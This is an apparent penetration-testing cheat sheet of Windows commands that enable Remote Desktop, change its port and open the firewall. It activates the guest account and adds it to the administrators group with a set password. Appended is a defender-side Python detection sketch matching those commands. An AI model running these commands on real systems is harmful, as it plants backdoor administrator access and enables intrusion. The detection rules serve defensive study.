Penetration Testing - Common Terminal Services Commands (cracer, Bilibili)
1. Query the Terminal Services port
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. Enable Terminal Services on XP & 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
net user guest /active:yes
net localgroup administrators guest /add
net user guest xiao
4. Remove the XP & 2003 system firewall restriction on Terminal Services and the IP connection restriction
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5. Enable Terminal Services on Win2000 (reboot required)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6. Commands for resolving "the terminal server has exceeded the maximum number of connections"
mstsc /v:ip:3389 /console
query user    (see how many sessions are online, then log off the corresponding ID)
logoff 6    (6 is the session ID)
sc qc mysql
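A defender-side detection sketch for the commands in items 2 to 4, added here as an example and not part of the original page: it matches process-creation command lines against the registry values and `net` account changes listed above. The rule names, the functions `normalize`, `detect` and `scan`, and the sample events are constructed for illustration; quotes are stripped before matching because the `Terminal" "Server` quoting used on this page defeats a literal match on `Terminal Server`.

```python
import re

def normalize(cmdline: str) -> str:
    """Lower-case, drop cmd.exe quotes and carets, collapse whitespace."""
    text = cmdline.lower().replace('"', "").replace("^", "")
    return re.sub(r"\s+", " ", text).strip()

REG_ADD = r"\breg(?:\.exe)? add .*"
NET = r"\bnet1?(?:\.exe)? "
# Hypothetical rule names; patterns follow the commands listed on this page.
RULES = {
    "rdp_enabled": REG_ADD + r"control\\terminal server .*\bfdenytsconnections\b"
                             r".* /d (?:0x)?0+(?: |$)",
    "rdp_port_changed": REG_ADD + r"terminal server\\(?:winstations\\rdp-tcp"
                                  r"|wds\\rdpwd\\tds\\tcp) .*\bportnumber\b",
    "firewall_port_opened": REG_ADD + r"firewallpolicy\\\w+\\globallyopenports\\list\b",
    "guest_activated": NET + r"user guest\b.*/active:yes\b",
    "local_admin_added": NET + r"localgroup administrators \S+ /add\b",
}
COMPILED = {name: re.compile(rx) for name, rx in RULES.items()}

def detect(cmdline: str) -> list:
    """Return the names of all rules that the command line triggers."""
    text = normalize(cmdline)
    return [name for name, rx in COMPILED.items() if rx.search(text)]

def scan(events):
    """events: iterable of (host, command_line); returns [(host, rule), ...]."""
    return [(host, rule) for host, cmd in events for rule in detect(cmd)]

TS = r'HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server'
# Constructed process-creation events (host, command line), not real logs.
SAMPLE_EVENTS = [
    ("WS01", "REG query " + TS + r"\WinStations\RDP-Tcp /v PortNumber"),  # read-only
    ("WS01", "REG ADD " + TS + " /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"),
    ("WS01", "REG ADD " + TS + r"\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f"),
    ("WS01", "net user guest /active:yes"),
    ("WS01", "net localgroup administrators guest /add"),
    ("WS02", "REG ADD " + TS + " /v fDenyTSConnections /t REG_DWORD /d 1 /f"),  # disables RDP
    ("WS02", "net user"),
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The read-only `REG query` and the `/d 1` write (which turns Remote Desktop off) produce no alert, so the rules fire only on the state changes the page describes.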